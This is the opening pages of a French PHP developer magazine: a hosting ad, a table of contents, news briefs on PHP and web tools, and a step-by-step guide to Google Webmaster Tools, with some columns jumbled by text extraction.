1 5/2009

HOSTING
NEXT LEVEL
Tous les tarifs s‘entendent HT et sont soumis aux conditions de vente de Hetzner Online AG.
Les prix sont susceptibles d‘être changés. Tous droits réservés par les fabricants respectifs.

HETZNER DEDICATED HETZNER DEDICATED HETZNER DEDICATED

ROOT SERVER EQ 4 ROOT SERVER EQ 6 ROOT SERVER EQ 9
Intel®Core™ i7-920 Quad- Intel®Core™ i7-920 Quad- Intel®Core™ i7-975 Quad-
core avec technologie core avec technologie core avec technologie
Hyper-Threading Hyper-Threading Hyper-Threading
8 Go DDR3 RAM 12 Go DDR3 RAM 12 Go DDR3 RAM « Hosting next level » signifie simplement que
2 x 750 Go SATA-II 2 x 1500 Go SATA-II 3 x 1500 Go SATA-II Hetzner Online propose aujourd’hui la plus
HDD (Software-RAID 1) HDD (Software-RAID 1) HDD (Software-RAID 5)
puissante des solutions d’hébergement dédié
Système d’exploitation Linux Système d’exploitation Linux Système d’exploitation Linux
Windows Server Windows Server Windows Server actuellement disponibles ! Les plans serveurs
à partir de 13 € par mois à partir de 13 € par mois à partir de 13 € par mois dédiés Hetzner Online sont conçus pour une
Trafic réseau illimité1 Trafic réseau illimité1 Trafic réseau illimité1 rapidité maximale et une stabilité réseau
Système « Rescue » Système « Rescue » Système « Rescue »
extrême dans nos propres datacenters
100 Go d’espace de 100 Go d’espace de 100 Go d’espace de
sauvegarde sauvegarde sauvegarde basés en Allemagne. Avec nos tarifs
Domain Registration Robot Domain Registration Robot Domain Registration Robot compétitifs et un support hors du
Pas de contrat minimum Pas de contrat minimum Pas de contrat minimum commun, nous dépassons déjà les
Frais d’installation : 126 € Frais d’installation : 126 € Frais d’installation : 126 € exigences de nos clients partout
dans le monde.
42,- € 58,- € 84,- €
par mois par mois par mois www.hetzner.info
1 Le trafic est gratuit. Nous limitons la vitesse à 10 Mbit/s si 5000 Go/mois sont dépassés. En option, une bande passante permanente garantie
de 100 Mbit/s est proposée à 6 € par To supplémentaire.
[email protected]
2 En tant que nouveau client, vous pouvez bénéficier de 8 € de réduction sur n’importe quel produit présenté ici. Utilisez, s’il vous plait, le code
promo 011905 en remplissant votre bon de commande. Cette offre expire le 01.06.2010.
2
Intel, le logo Intel, Intel Core et Core Inside sont des marques déposées par Intel Corporation aux U.S.A. et dans d‘autres pays.
www.phpsolmag.org 3
 TABLE DES MATIÈRES
VARIA
6 Actualités
Actualités du monde du développement.

OUTILS
8 Les Google Webmaster Tools
Eric Vincent
Google met à disposition des webmasters toute une série d’outils
pour les aider. Ces outils évoluent dans le temps et il est néces-
saire d’y passer régulièrement du temps. Voyons les différentes
étapes pour découvrir ces outils qui devraient vous permettre
d’améliorer votre site, aussi bien sur le visuel que sur le référen-
cement.
16 Administrer votre serveur Debian par SSH
Faure Yann
Debian est une distribution Linux non commerciale lancée par Ian
Murdock. Debian est souvent utilisé grâce à sa réputation de distri-
bution extrêmement stable. Dans cet article, vous allez apprendre
comment installer et configurer un serveur Debian avec Apache,
PHP, MySQL, PHPMyAdmin, Webmin ainsi que Proftpd par SSH.

DOSSIER
20 AJAX facile avec JQuery et Zend Framework
Guillaume Ponçon
jQuery est une bibliothèque Javascript. Intégrée à Zend Fra-
mework, elle permet de développer rapidement des interfaces
riches et dynamique. Cet article utilise le lien AJAX proposé par
ZendX_JQuery, utilisé à travers le modèle MVC du framework.

PRATIQUE
24 CLI : PHP en ligne de commande
Jérémy Rafflin
PHP est habituellement utilisé pour la création de sites ou de ser-
vices web, mais CLI permet d’utiliser PHP en ligne de commande
dans la console d’un système d’exploitation. CLI est un outil sûr
et très utilisé pour créer des scripts shell (script système). Grâce
à cet article vous découvrirez l’utilisation de PHP en ligne de com-
mande et avec des scripts.

29 Manipuler les cookies avec PHP

Magali Contensin, Cécile Odero
Les cookies sont utilisés par un grand nombre d’applications
et de sites web pour stocker les préférences d’un utilisateur, pour
assurer un suivi de session ou pour pister l’utilisateur. Dans cet ar-
PROJETS ticle vous étudierez la transmission de cookies entre un client
et un serveur web, et vous apprendrez à manipuler
12 Préprocesseur CSS les cookies depuis un script PHP.
Aurélien Masfrand
Cela fait dix ans que les CSS existent, cependant nous en som- 34 Android ou gPhone
mes pratiquement au point de départ en terme d’optimisation. Thierry Borel
D’un site à un autre on préférera tout recommencer avec une co- Vous voulez changer de
pie vierge, ou presque. Dans le domaine de la programmation, on téléphone en pensant
utilise des méthodes pour capitaliser et améliorer notre travail : à un smartphone ?
MVC, KISS... Cet article présente l’utilité et les possibilités d’un pré- Oui mais lequel ?
processeur CSS. Vous avez enten-

4
 www.phpsolmag.org

du parler d’Android, de gPhone et vous aimeriez creuser le sujet

puisque vous connaissez déjà plus ou moins l’iPhone, Windows
Mobile et d’autres noms. Penchons-nous donc sur le petit nou-
veau : Android qui nous amènera vers le gPhone en douceur. POUR
LES
FICHE TECHNIQUE DÉBUTANTS
40 MySQLND : une économie de ressources 50 Un comparatif
Christophe Villeneuve de forums PHP
Le langage PHP est souvent associé à la base de données MySQL Eric Vincent
et initialement un nouveau driver devait voir le Quand on a un site qui se développe, il peut
jour avec la sortie de PHP 6. Les choix et les être nécessaire de créer un espace de discus-
orientations ont modifié sion que l’on appelle le plus souvent forum. Là, vous
la date de sortie de allez constater visuellement que l’on peut vite se retrou-
celui-ci. C’est avec ver perdu dans la jungle des résultats. En effet, il existe dif-
la sortie de PHP 5.3 férents types de forum en PHP, tous ayant des inconditionnels
que l’évolution est et des détracteurs. Dans cet article, essayons d’y voir plus clair.
apparue au niveau
de la relation entre
PHP et MySQL. Il LINUX
s’agit d’un nou-
veau driver ap- 54 Puppy Linux / Toutou Linux une distribution
pelé MySQLND très légère et à la pointe de la technologie !
qui veut dire MyS- Laurent Derosier
QL Native Driver. Ce Puppy Linux est une distribution
nouveau driver va Linux créée par Barry Kauler en
apporter énormément 2002 et constamment amé-
de changement et d’évo- liorée par son auteur et une
lution, dont l’article vous montrera un aperçu des nouvelles possi- communauté active de déve-
bilités qui vous sont offertes. loppeurs. Emmenez partout
avec vous cette distribu-
tion très légère mais très
SÉCURITÉ performante et à la poin-
te de la technologie !
46 PHP et la sécurité
Dony Chiquel
Le Common Vulnerabilities and Exposures (en abrégé CVE)
énumère plusieurs vulnérabilités affectant PHP. Ces vulnéra-
bilités peuvent être utilisées par des hackers pour modifier le
contenu ou le comportement d’un site ou d’une application
web PHP. Après avoir suivi cet article vous saurez comment s’en
prémunir et comment sécuriser vos sites et vos applications
web !

5
 Actualités

Joomla 1.5.7
La nouvelle version du CMS Joomla vient
de sortir, apportant de nombreux correc-
tifs de sécurités. Par ailleurs, Depuis la ver-
sion 1.5.16, Joomla est compatible PHP 5.3.
Cette version a été entièrement traduite en
Français.
http://www.joomla.fr
PHP 5.3.2
La version de PHP 5.3.2 apporte quelques
évolutions et correctifs. Mais maintenant
le mode SSL est supporté avec le driver
MySQLND.
http://www.php.net
XMP PHP Toolkit
XMP PHP Toolkit est une nouvelle exten-
sion pour PHP 5. Il s’inspire de XMP Toolkit
d’Adobe pour lire et écrire les métadonnées
dans les fichiers multimédia et ne tourne
actuellement que sous GNU/Linux.
http://xmpphptoolkit.sourceforge.net/
Eye OS
E
ye OS est une application vous per- le glisser-déposer et le couper / copier / coller
mettant d’avoir votre propre bureau entre les différentes fenêtres.
virtuel à travers le web. Cette appli- Cette nouvelle version propose une évolu-
cation a été développée en PHP/Javascript tion de l’outil administration et de la suite
et vient de sortir en version 2. La version de bureautique avec un affichage en temps réel.
base comprend un système de fichiers pour La demande de documents a été amélioré
les utilisateurs et 5 applications. Ces applica- et vous pouvez travailler avec l’application,
tions sont orientées bureautiques comme des créer, enregistrer et ouvrir les documents.
logiciels de traitements de textes, de feuilles de
calculs, de calendrier... et en 19 langues.
Mais comme tout bureau, un gestionnaire
de fichiers est proposé vous permettant de
gérer vos fichiers, de les manipuler comme

Posh 2.2
La nouvelle version de Posh va vous per-
mettre de faire évoluer votre portail par
de nombreuses options. Pour rappel,
Posh est une API réalisée en PHP/MySQL/
Ajax pour vous permettre de réaliser fa-
cilement un portail personnalisé d’actua-
lités ou de flux pouvant vous intéresser.
Cette nouvelle version propose de nom-
breuses extensions avec la possibilité de
se connecter vers d’autres applications
comme Joomla, Alfresco, Google docs,
phpBB, LDAP... pour vous permettre de 15 ans avec PHP
L
widgetiser ces applications dans votre e 8 juin 2010 est l’anniversaire de la local et aussi un langage en ligne de comman-
portail.
http://www.portaneo.com/websites/home/ naissance du langage PHP. 2 versions de pour exécuter des programmes ou devenir
portal/index.php sont maintenues : PHP 5.2.10 et 5.3.2. une plate-forme. Il possède l’avantage de pou-
Ces versions sont liées à la sortie de PHP 5.3 voir communiquer avec l’ensemble des autres
PHP 6 suspendu faisant apparaître de nombreuses évolutions langages et propose un large choix d’exten-
Rasmus Lerdorf, par un communiqué,
et améliorations du langage. Ces évolutions sions permettant d’avoir un outil modulaire.
a annoncé que le chantier de la version
6 était dans l’impasse et par conséquent voient l’apparition des Namespaces, la librairie Cette modularité permet d’être apprécié
cette branche a été stoppée. La décision MySQLND. par le monde entier. Les analyses et sonda-
de ce choix difficile est provoquée par l’in- Mais il est important de faire un petit ré- ges montrent que le langage PHP se trouve
tégration de l’unicode qui montre que ce sumé de 15 ans de PHP et surtout pourquoi dans le peloton de tête au coté des langages
chantier est plus dur à mettre en place par
il est devenu le langage incontournable dans comme le Basic et le C. En 2008, PHP était
rapport aux prévisions.
Bien entendu les contributeurs de cette les applications dynamiques Webs. déployé sur 35,1 millions de serveurs (source
branche souhaitent se laisser un peu de La première page publié en PHP a été réa- nexen.net).
temps pour trouver une nouvelle évolu- lisé par Rasmus Lerdof avec son code source Son image est un langage populaire et une
tion. Les évolutions prévues pour PHP 6 pour le monde entier puisse l’utiliser et sur- mascotte existe autour du langage. Il s’agit
sont la sécurité, la POO et l’évolution de
tout en profiter. Régulièrement de nombreu- d’un elePHPant dont l’origine vient de Vin-
PECL devraient être intégrée dans les pro-
chaines versions. ses évolutions ont été apportés pour répondre cent Pontier (El roubio) et la peluche distri-
http://news.php.net/php.internals/47120 aux différentes attentes. buée à travers un site internet www.eleph-
Deux après, Rasmus Lerdof fut rejoint par pant.com
Piwigo 2 Andi Gutmans et Zeev Suraski pour redéve- Pour cette année exceptionnelle, l’AFUP
Piwigo permet de créer facilement une
galerie d’images. Elle se différencie des lopper le coeur de PHP sous une version 3. (l’Association Française des Utilisateurs de
autres par la présence d’un moteur de Dès sa sortie et pour répondre aux attentes, un PHP) proposera un grand rendez-vous pour
Template, 100 % en UTF-8, sous PHP 5 / nouveau coeur a été développé, appelé Zend marquer les 15 ans de PHP au forum PHP.
MySQL 5. Une autre approche d’ajouter Engine qui est utilisé depuis la version 4 de
des photos sans passer par le mode FTP
PHP. Depuis la version 5 de PHP, le développe-
et de nombreux Plugins. Une version
démo est disponible sur le site pour se ment objet a vu le jour, tout en gardant tous les
rendre compte du résultat et des possibi- avantages qui ont fait le succès de PHP 4.
lités de l’API : L’utilisation de PHP permet d’être à la fois
http://fr.piwigo.org/ un langage interprété dans un environnement

6 4/2010

Web2project
W
eb2Project est une nouvelle ap-
plication et plus exactement un
PMS (Project Management System)
et tourne sous un environnement Apache/
PHP/MySQL en Open source. Son but est de
vous permettre de gérer facilement vos projets.
La gestion de projet devient utile lorsque
vous devez gérer plusieurs projets en simul-
tané. La majorité des projets se décompose de
45% de très petits, 20 % moyens, et une dou-
zaine de gros.
Web2Projet va répondre à toutes ces attentes
et proposent de nombreuses caractéristiques :
• Infrastructure sécurisée sur le web.
• Gestion de plusieurs projets en simultané.
• Gestion d'ajout et de suppression de mo-
dules suivant vos besoins.
• Centralise le projet de communication.
Chive
P
our administrer les bases de don-
nées MySQL, il existe phpMyAdmin,
très répandu. Il existe de nombreu-
ses alternatives permettant de faire comme
Chive.
Chive est une application, réalisée en PHP
5 et Ajax, sous licence GPL v3 et a pour but
l’administration des bases de données MyS-
QL 5 avec un environnement Apache (mod_
rewrite actif). Actuellement il fonctionne que
sous linux mais devrait fonctionner sur les
autres systèmes prochainement.
L’ergonomie est l’un des points qui a été
mis en avant par cette API, disposant de de-
sign différents et de skins pour personnaliser
votre propre environnement. Il se veut plus
souple et donc efficace pour administrer les
bases de données et basé sur le modèle MVC
et tests unitaires.
www.phpsolmag.org
• Présence d'un diagramme de Gantt pour
gérer vos projets.
• Présence d'un calendrier indiquant les
tâches et évènements.
L'application vous sera encore plus utile si
plusieurs personnes interviennent dans un
même projet, mais aussi de répartir la charge
et la façon de programmer comme l'utilisa-
tion de la Programmation Orientée Objet.
Le projet propose sur son site internet, une
version de démonstration pour effectuer les
tests, mais aussi une documentation en ligne
et un forum
http://web2project.net/
Après son installation, les fonctionnalités
principales sont proposées :
• Création et gestion d'une base de don-
nées.
• Navigation.
• Gestion utilisateur.
• Editeur avec coloration syntaxique.
• Import / Export.
Lors des manipulations des requêtes SQL,
une coloration syntaxique vous permettra de
repérer les erreurs éventuelles lors de vos dé-
veloppements.
Actualités
PHP Speedy
Il existe différentes manières d’optimiser
les pages web pour limiter le temps de
chargement comme PHP Speedy. Il s’agit
d’un petit script qui s’insère dans vos pages
et va vous permettre de gagner du temps
d’affichage.
http://aciddrop.com/php-speedy/
EZ publish 4.3
Le CMS eZ Publish propose dans sa nouvel-
le version, une nouvelle interface d’admi-
nistration, un système étendu de gestion
des commentaires, de nombreuses amélio-
rations concernant les extensions comme
eZFlow et eZfind, et une amélioration des
performances. Par ailleurs, de nouvelles
fonctionnalités sont apparues comme
eZ Teamroom.
http://ez.no/fr/
Forum PHP 2010
Pour les 10 ans de l’AFUP, l’Association
Française des Utilisateurs de PHP a dévoilé
les dates du prochain Forum PHP : 9 et 10
novembre 2010, à la cité des sciences de
Paris.
http://www.afup.org
Gomodo
Gomodo est un nouveau type de moteur
de recherche pour les développeurs. Il
propose de rechercher et de trouver plus
facilement des informations venant des
documentations officielles sur les langages
(PHP, HTML, Javascript, CSS) mais aussi Fra-
meworks (Jquery, Prototype). Ce moteur
peut se greffer dans la barre de recherche
Google pour vous aider et évolue réguliè-
rement.
http://gomodo.net/
Skipfish
Skipfish est un scanner de sécurité pour
les applications web que Google propose.
Il propose les mêmes fonctionnalités que
Nmap ou Nessus mais en beaucoup plus
rapide. Les différents tests effectués avec
cet outil affichent l’exécution de 2000 re-
quêtes HTTP par seconde. Bien entendu,
il permet de repérer les risques d’attaque
du type Cross-site scripting (XSS), injection
SQL, XML...
http://code.google.com/p/skipfish/
Spip 2.1
Cette nouvelle version s’ouvre vers la modu-
larisation des fonctionnalités sous la forme
d’extensions et de plugins, Mais Spip a subi
aussi d’autres évolutions comme une amé-
lioration du cache et plus de sécurité. Il est
aussi compatible avec PHP 5.3 et intègre la
bibliothèque Jquery 1.4.2 et pclzip 2.8.2. Il
est maintenant plus extensible et plus struc-
turé avec une amélioration du débuggage.
http://www.spip.net
Xtrabackup 1.1
Xtrabackup est une solution alternative
à InnoDB Hit Backup pour effectuer des
sauvegardes à chaud pour MySQL 5.0.
http://www.percona.com/
7
 Outils

Les Google
Webmaster Tools
Google n'est pas qu'un moteur de recherche, il propose
également de nombreux outils. Intéressons-nous
à un de ces outils : Google Webmaster Tools. Cet article
vous propose de vous présenter le contenu de ses outils,
qui sont gratuits.
votre page d’accueil (index.html ou index.htm
Cet article explique : Ce qu’il faut savoir : ou index.php) puis transférez là sur le serveur
• Les outils pour webmasters de Google. • Accéder au serveur de son site. de votre site. A l’écran, rassurez-vous, absolu-
• Avoir un éditeur de texte. ment rien ne change. Le transfert étant effec-
tué, revenez sur la page des outils et cliquez
sur Verify. Maintenant, votre site est reconnu
par Google.
A noter que Google propose une autre mé-
à avoir. Voir la figure 2. La Figure 2 présente thode pour valider votre site. On vient de voir
l’état de votre site et ce qu’il faut faire pour la méthode Meta tag, vous pouvez choisir
Niveau de difficulté qu’il soit validé par Google. Upload an HTML file. Le principe est de trans-
Afin de valider votre site, il faut ajouter férer sur votre serveur un fichier transmis par
à votre page d’accueil la ligne de code présen- Google et non pas d’ajouter une seule ligne de
tée à l’écran. Procédez à la modification de code. Le reste de la validation reste identique.

G
oogle met à disposition des web-
masters toute une série d’outils
pour les aider. Ces outils évoluent
dans le temps et il est nécessaire d’y passer ré-
gulièrement du temps. Voyons les différentes
étapes pour découvrir ces outils qui devraient
vous permettre d’améliorer votre site, aussi
bien sur le visuel que sur le référencement.

Étape 1 : Avoir un compte

Pour accéder aux outils, il est nécessaire
d’avoir un compte Gmail. Si vous en avez un,
connectez-vous avec. Si vous n’avez pas enco- Figure 1. Arrivée sur les outils pour webmasters de Google
re de compte Gmail, alors il faut en créer un,
c’est gratuit et la création ne prend pas plus
de deux minutes.

Étape 2 : Ajouter et valider

le site
En plein milieu de l’écran, vous voyez un bou-
ton Ajouter un site. Voir la Figure 1. Cliquez
sur le bouton Ajouter un site. La Figure 1 pré-
sente l’écran d’arrivée sur les outils pour web-
masters de Google.
Maintenant, entrez l’adresse de votre site
puis cliquez sur Continuez et vous arrivez sur
une première page de résultat. Logiquement,
votre site n’est pas validé, il est donc normal
que le statut soit en rouge, pas d’inquiétude Figure 2. État de votre site et ce qu'il faut faire pour qu'il soit validé par Google

8 4/2010

Étape 3 : Créer et envoyer
un sitemap
Un sitemap est le plan de votre site. Il contient
tous les liens principaux, voire l’arborescen-
ce complète de votre site si celui-ci est sim-
ple au niveau structure. Le but d’un sitemap
est d’informer Google de la structure de vo-
tre site, des liens qui s’y trouvent afin qu’il
le connaisse mieux, donc qu’il le référence
mieux.
Cliquez sur Center pour les webmasters
puis sur A propos des sitemaps puis sur Créa-
tion et envoi de sitemaps. Pour créer un tel fi-
chier, Google vous propose de le faire ma-
nuellement, ce qui est possible mais il ne
faut pas avoir beaucoup de pages sur votre
site, de le générer mais il faut avoir Python
sur votre serveur et c’est le cas d’une mino-
rité ou bien encore de le faire en partant de
votre flux RSS, qui peut contenir les der-
nières pages actualisées de votre site mais
il est peu probable qu’il contienne un plan
correct.
Il existe des sites qui fabriquent en quel-
ques secondes ce fichier, c’est la méthode
choisie. Allons sur le site http://www.xml-site-
maps.com pour générer notre fichier sitemap.
Dans la version gratuite, le fichier généré
aura 500 liens, ce qui est probablement lar-
gement suffisant pour votre site. Une version
payante existe, 19.99 dollars et dans ce cas,
aucune limite de liens. Quelque soit la ver-
sion utilisée, le fichier XML généré sera va-
lide par rapport au W3C. Voir la Figure 3. La
Figure 3 présente l’étape de création de votre
sitemap.
Au final, votre sitemap est généré sous dif-
férentes formes, nous prendrons le premier
choix, le format XML. Cliquez sur le lien de
votre sitemap, enregistrez-le sur votre ordina-
teur puis transférez-le à la racine de votre ser-
veur. Pour terminer cette étape, il faut infor-
mer Google que votre sitemap est disponible
sur votre serveur.
Étape 4 : Le tableau de bord
Lorsque la validation est faite, vous arrivez sur
votre tableau de bord. C’est à partir de celui-
ci que l’on va continuer notre travail. Prenons
point par point. Sur la partie gauche, vous
voyez Configuration du site, Votre site sur le
Web, Diagnostic et Labos puis en dessus, vous
avez une partie d’aide que l’on ne détaillera
pas. Voir la Figure 4. La Figure 4 présente le
tableau de bord de votre site.
Étape 5 : Configuration du site
En cliquant sur Configuration du site, cinq
choix apparaissent, dont un que l’on a déjà
traité, le sitemap. Regardons les autres. Voir
la Figure 5. La Figure 5 présente les diffé-
rents choix du menu de Configuration du
site.
www.phpsolmag.org
Google Webmaster Tools
Accès au robot d’exploration : c’est le célèbre
robots.txt qui gère le crawl de Google sur vo-
tre site. En effet, il est possible que vous ne
vouliez pas que certains répertoires soient ré-
pertoriés par Google. Si c’est le cas, c’est ici
que vous devez intervenir. Si vous avez déjà
un fichier robots.txt, il sera affiché à l’écran.
Si ce n’est pas le cas, vous pouvez tout à fait
en créer un en cliquant sur Générer un fichier
robots.txt.
Lorsque votre fichier vous satisfait, il faut
procéder comme pour le fichier Sitemap :
vous le téléchargez localement puis vous le
transférez sur votre serveur. Attention à ne
pas changer le nom du fichier. Il doit s’appe-
ler robots.txt et pas autrement.
Liens de site : cette option prend de l’im-
portance, il faut s’y intéresser et on va mieux
comprendre ici l’importance des liens inter-
nes, notamment à partir de la page d’accueil.
Chaque partie de votre site a une importance
plus ou moins importante, chaque partie de
votre site sera plus ou moins consultée donc
chaque partie doit être traitée spécialement Figure 3. Étape de création de votre sitemap
au niveau des liens internes. Ainsi, si vous
voulez mettre une partie en avant, il faut que Changement d’adresse : par définition, l’uti-
pratiquement toutes les pages de votre site lisation de ce choix sera très limitée mais
pointent vers cette partie. Au final, Google re- étant donné son importance, il est nécessaire
connaît l’importance de cette partie et celle-ci d’en connaître le contexte. Chaque webmas-
se retrouvera mieux placée dans les résultats ter peut être confronté tôt ou tard à un chan-
de Google et cette importance sera formalisée gement de domaine. C’est ici que l’on va gérer
par un affichage différent. Voir la Figure 5a. ce cas. En fait, le principe est de gérer la re-
La Figure 5a présente les liens sur votre site direction 301. Si vous ne faîtes pas ce travail
que Google a qualifié d’importants. correctement, vous allez avoir une baisse aussi
Figure 4. Le tableau de bord de votre site
Figure 5. Les différents choix du menu de Configuration du site
9
 Outils

Tableau1. Les 5 options les plus importantes de Google Webmaster Tools

Titre Arborescence Remarques Périodicité recommandée

Sitemaps Configuration du site Création d’un fichier sitemap.xml Trimestrielle
Accès du robot Configuration du site Création d’un fichier robots.txt Trimestrielle
Requêtes les plus fréquentes Votre site sur le Web Très important pour le référencement Quotidienne ou hebdomadaire suivant
la nature et l’importance de votre site
Mots clés Votre site sur le Web Très important pour le référencement Quotidienne ou hebdomadaire suivant
la nature et l’importance de votre site
Suggestions HTML Diagnostic Important pour le référencement Mensuelle

rapide que spectaculaire de vos visites par les
moteurs de recherches ! Google pourrait ne
plus reconnaître vos pages donc vous n’aurez
pratiquement plus aucun trafic via ce moteur
de recherche qui a environ 85% du marché.
Devant de telles conséquences, il serait dom-
mage de ne pas s’attarder sur ce changement
d’adresse, surtout quand le temps de travail
n’est pas important.
Paramètres : votre site étant validé, Google
a procédé à quelques recherches et les affiche.
Logiquement, tout est bien renseigné et vous
n’aurez rien à faire dans cette partie.
Étape 6 : Votre site sur le Web
La partie Configuration du site était plus dans
le domaine architecture, par contre la partie
Votre site sur le Web est toute aussi importante
et elle entre plus dans le concret des mots clés,
du référencement et du travail à faire réguliè-
rement. Parcourons les choix un à un. Voir la
Figure 6. La Figure 6 présente les différents
choix du menu de Votre site sur le Web.
Requêtes les plus fréquentes : pour les web-
masters qui ont un site de e-commerce, les lis-
Figure 5a. Les liens sur votre site que Google
a qualifié d'importants
tes qui apparaissent à l’écran sont une mine
d’or. A gauche, on voit la liste des recherches
où notre site a été affiché, à droite, on a la liste
des requêtes qui ont amenées une visite sur
notre site. On est également informé par des
pourcentages et par la position dans les résul-
tats de recherche. On peut également faire
des tris sur chaque critère.
Liens vers votre site: nouvelle liste, qui don-
ne des éléments importants. On a la liste des
liens de notre site triée par nombre de liens
entrants. En cliquant sur le nombre de liens
d’une page, on visualise tous les liens vers la
page avec la date de visite.
Mots clés : une liste, c’est bien mais un gra-
phisme est également intéressant. Avec cette
option, on visualise l’importance de certains
mots trouvés lors de l’exploration du site par
Google. Avec cette option, ce n’est pas l’in-
ternaute qui influe avec ses recherches et ses
clics, c’est le robot de Google. Ainsi, on peut
voir concrètement si le mot que l’on voulait
mettre en avant a atteint l’objectif prévu ou
pas. Ici, à partir des 10 premiers mots clés
(10 étant donné à titre d’exemple), il faut me-
Figure 6. Les différents choix du menu de Votre
site sur le Web
ner une réflexion pour rectifier le tir car un
mot clé peut être totalement hors sujet.
Liens internes : nous visualisons ici la liste des
liens internes, c’est-à-dire la liste des liens de
notre site vers notre site. On peut faire un tri,
on peut ici également cliquer sur le nombre de
liens internes afin d’obtenir la liste des pages
qui ont amenée vers la page de référence.
Statistiques sur les abonnés : par exemple,
si vous avez un flux RSS (ce qui serait bien
et intéressant !), Google Webmasters Tools
vous donne le nombre d’abonnés Google. En
consultant régulièrement les chiffres donnés,
vous pourrez suivre les évolutions. C’est un
élément moins important que les mots clés
mais savoir si les flux intéressent les internau-
tes est un autre paramètre à prendre en comp-
te et c’est un élément de valorisation d’un site.
Étape 7 : Diagnostic
Autre partie, la partie Diagnostic. S’il n’est
pas nécessaire de la surveiller, de venir la
consulter tous les jours, il est tout de mê-
me utile de la connaître et de la prendre en
compte de temps en temps. Une consulta-
tion mensuelle semble être un bon rythme
pour étudier les volumes. Voir la Figure 7. La
Figure 7 présente les différents choix du me-
nu de Diagnostic.
Erreurs d’exploration : seul l’onglet Web est
utile dans 99% des cas. Google vous dresse ici
toute une série d’éléments pouvant générer
des erreurs : robots.txt, sitemap, délai, HTTP,
inacessible, introuvable, non suivies. Le plus
souvent, c’est la partie introuvable qui sera
valorisée. Consultez cette partie plus en dé-
tails et maintenant que vous en êtes à ce ni-
veau dans cet article, vous savez quoi faire !
Comment ça non ? Créez une page 404 en
premier puis analysez les raisons de cet état
introuvable.
Statistiques sur l’exploration : par son robot,
Google arrive à établir des statistiques sur vo-
tre site : page explorées par jour, kilo-octets
téléchargés par jour et temps de télécharge-
ment d’une page. A noter que les chiffres pu-
bliés sont approximatifs. Dans le cas de mon
site, pour la partie Pages explorées par jour, les
données de Google sont entre 5 et 10 fois in-
férieures à la réalité. Je précise que pour le site
en question je n’utilise pas Google Analytics.

10 4/2010

Sur Internet
• http://www.google.fr/ – Le celèbre moteur de recherche Google,
• http://www.xml-sitemaps.com – Pour créer un sitemap,
• http://www.robotstxt.org/ – Pour en savoir plus sur le fichier robots.txt, en anglais.
Suggestions HTML : nouvelles statistiques,
plus pertinentes que dans le cas vu ci-dessus
et il est possible d’avoir une charge de travail
importante. Ici, vous avez donc toute une sé-
rie de statistiques au niveau des Meta et des
title. La balise Meta obéit à des règles précises
et Google vous précise les balises hors règle :
balise en double, trop longues ou trop cour-
tes. Procédé identique pour la balise Title. On
a des règles et quand ces règles ne sont pas res-
pectées, Google le dit : balise manquante, en
double, trop longue, trop courte, non infor-
mative. Dernier élément : sur l’indexation.
Google vous précise s’il a rencontré du conte-
nu non indexable.
Étape 8 : Labos
Quatre choix sont possibles mais nous allons
en détailler deux : Informations détaillées rela-
tives aux logiciels malveillants et Performances
du site. Voir la Figure 8. La Figure 8 présente
les différents choix du menu de Labos.
Informations détaillées relatives aux logiciels
malveillants : un jour , vous serez peut-être
attaqué par un virus et Google peut ici vous
aider à mieux le circonscrire. Cet outil permet
de déterminer quelles portions de code font
qu’une page est considérée comme potentiel-
lement dangereuse par Google : injection de
code, code malveillant. Pratiquement tout le
Figure 7. Les différents choix du menu de
Diagnostic
www.phpsolmag.org
Google Webmaster Tools
temps, vous aurez le message suivant : Google
n’a détecté aucun logiciel malveillant sur ce site.
Performances du site : tout webmaster sait que
le temps d’accès aux pages du site est un critère
important pour fidéliser un internaute. Si les
pages sont trop longues, l’internaute ne reste-
ra pas, ne reviendra pas. Alors, autant prendre
en compte ce critère avec l’importance qu’il
a et avec les Google Webmasters Tools, nous
avons un graphique de l’accès au site et des sta-
tistiques de comparaison avec les autres sites
d’une façon générale. Les Google Webmaster
Tools vous donnent également toute une série
de travail à faire pour améliorer l’accès au site.
Vous avez également comme suggestion d’ins-
taller l’outil Page Speed, qui fonctionne avec Fi-
refox. Cet outil fait partie de l’univers Firebug
et son installation ainsi que son utilisation se
font comme les autres outils de Firefox.
Tableau récapitulatif des options
les plus importantes
On a maintenant parcouru les Google Web-
masters Tools. Dans le tableau 1, vous avez les
5 options les plus importantes avec pour cha-
cune d'elle, comment la trouver, des remar-
ques et la périodicité recommandée.
Conclusion
Google met à disposition gratuitement
et sans ajout de code sur votre site une large
série d’outils. Ces outils sont d’une aide pré-
cieuse pour la gestion d’un site Internet, aussi
bien au niveau du référencement qu’au ni-
veau technique (page 404, fichier robots.txt,
fichier sitemap.xml).
S’il n’est pas utile de regarder ces outils
quotidiennement, il est nécessaire de faire
une passe régulièrement, surtout si votre site
est dans le secteur e-commerce. En outre, ces
outils peuvent aider les webmasters à faire des
présentations à des collaborateurs, à des chefs
de projet ou à des directeurs. Simple d’accès,
gratuits et bien documentés, les Google Web-
master Tools sont incontournables et il serait
dommage de ne pas les utiliser.
ERIC VINCENT
Informaticien de gestion de formation, Eric VIN-
CENT s’est orienté vers l’Internet dès son arrivée,
au début des années 2000. Il a rapidement créé
plusieurs sites Internet sur le sport. Ces sites cu-
mulent aujourd’hui plusieurs millions de pages
lues. Pour contacter l’auteur : ericvincent@no-
made.fr
11
 Projets

Préprocesseur
CSS
Cet article présente l’utilité et les possibilités
d’un préprocesseur CSS. Un outil pour générer
du CSS.

Pour notre thème hivernal nous avons le

Cet article explique : Ce qu’il faut savoir : Listing 1 en CSS normal, et Listing 2 avec
• Ce qu'il est possible de faire avec un prépro- • Connaître les bases du CSS. CSScaffold. On remarque tout de suite une
cesseur CSS, comment optimiser son travail optimisation du code avec l’utilisation des
en CSS. constantes. Nous faisons ici d’une pierre
deux coups. Non seulement on a gagné en
clarté en imbriquant nos sélecteurs, mais en
plus on a gagné du temps sur l’élaboration des
tions, des objets, ... le tout en adoptant la feuilles de style été, printemps, ...
méthode DRY – Don’t repeat yourself – Ne
Niveau de difficulté jamais se répéter, autrement dit factoriser au Créer votre boîte à outils
maximum. Nous avons vu comment optimiser notre co-
de dès le premier projet. Faisons en sorte de
En pratique... gagner du temps d’un projet à un autre.

C
